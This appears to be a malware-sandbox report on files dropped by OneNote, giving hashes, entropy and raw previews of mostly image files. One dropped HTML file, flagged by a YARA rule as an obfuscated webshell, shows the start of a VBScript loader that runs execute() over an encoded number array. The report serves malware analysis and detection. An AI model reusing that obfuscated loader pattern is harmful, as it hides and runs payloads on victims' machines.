                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6838CA11-98D6-4744-96EC-3B17EEC0177B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6857214B-66CD-455A-BC6A-794C3A8AC5BE}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{69037DAE-EAEE-41D2-832C-218584D86593}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2033
                                                                                                                                            Entropy (8bit):6.8741208714657
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                            MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                            SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                            SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                            SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{693D2051-0F19-48F6-B744-37E31A4E8C6E}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (18859), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23607
                                                                                                                                            Entropy (8bit):4.399875668688412
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:0ttRtO74aTReR26QLaZnwd7T9YLejbMqQU4R+GWXeRRjH7s/vNousrM277sLyore:0v7xS+6r2ZiNe7Foel6nG
                                                                                                                                            MD5:7146557E5F41764249375BC3F78D1940
                                                                                                                                            SHA1:9C6AD74C4E2C4DC1E5A27164A399F81D06710D1D
                                                                                                                                            SHA-256:787D8B615BD835EAE99904E031B35645D8898909E4AAB512AF64171841F8033B
                                                                                                                                            SHA-512:E56C196E66B5A19518591189EA682AC5F84ACACC47DF9B759EDE5559F9BB8F5FBB86955D23FE16D08225526F867D05C135B3E7BFD9EEECFE203BB4BBE820D891
                                                                                                                                            Malicious:false
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Temp\{693D2051-0F19-48F6-B744-37E31A4E8C6E}.bin, Author: Arnim Rupp
                                                                                                                                            Preview:<html><head><script language="vbscript">..Sub VnnTDIHERQAuvaRpjX(OoApSvEoSGyffAOvR) : eval("execute(OoApSvEoSGyffAOvR)") : End Sub..xzUpxubNpiSVvciVOyyKliJJ = array(211, 232, 133, 172, 224, 191, 177, 194, 122, 215, 179, 235, 186, 182, 191, 149, 209, 213, 199, 227, 89, 121, 139, 187, 180, 133, 183, 185, 151, 136, 130, 106, 161, 200, 189, 130, 187, 167, 198, 136, 161, 116, 144, 196, 175, 175, 204, 191, 159, 217, 207, 184, 213, 224, 120, 108, 166, 204, 230, 174, 224, 226, 212, 188, 212, 151, 155, 179, 211, 199, 181, 239, 184, 220, 167, 224, 146, 178, 184, 188, 171, 236, 118, 162, 128, 132, 163, 213, 145, 168, 182, 210, 144, 140, 231, 198, 171, 223, 198, 175, 222, 218, 237, 225, 220, 137, 111, 170, 171, 177, 149, 229, 219, 192, 190, 207, 197, 176, 180, 194, 203, 173, 165, 205, 188, 228, 208, 212, 178, 205, 193, 165, 175, 190, 195, 179, 230, 189, 205, 115, 142, 137, 182, 188, 173, 213, 142, 184, 139, 128, 154, 176, 170, 185, 147, 166, 135, 109, 103, 128, 154, 176, 219, 111, 227, 220, 150, 1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{694DD297-852E-4D88-8986-0169F7F3945D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):784
                                                                                                                                            Entropy (8bit):6.962539208465222
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                                                            MD5:14105A831FE32590E52C2E2E41879624
                                                                                                                                            SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                                                            SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                                                            SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6AA133FB-BC10-4572-B8AB-C7077DAB8FC6}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6AA45898-01DC-447A-A740-981DE5380A1E}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6B013BD3-2CF6-4430-A658-C44B882C4EF8}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6BCDA153-AA7C-4124-A804-56FACBCA4872}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6C0D4AD9-0F3E-4B9F-96B2-A17C7CCB3C9D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6D6C9D4E-C4D0-4528-A66C-18461D5AEA5F}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6EAA9850-093A-45CF-8459-F767C6FE759B}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6FCBFD54-57DD-4722-A76C-B7B63A426E71}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12824
                                                                                                                                            Entropy (8bit):7.974776104184905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                            MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                            SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
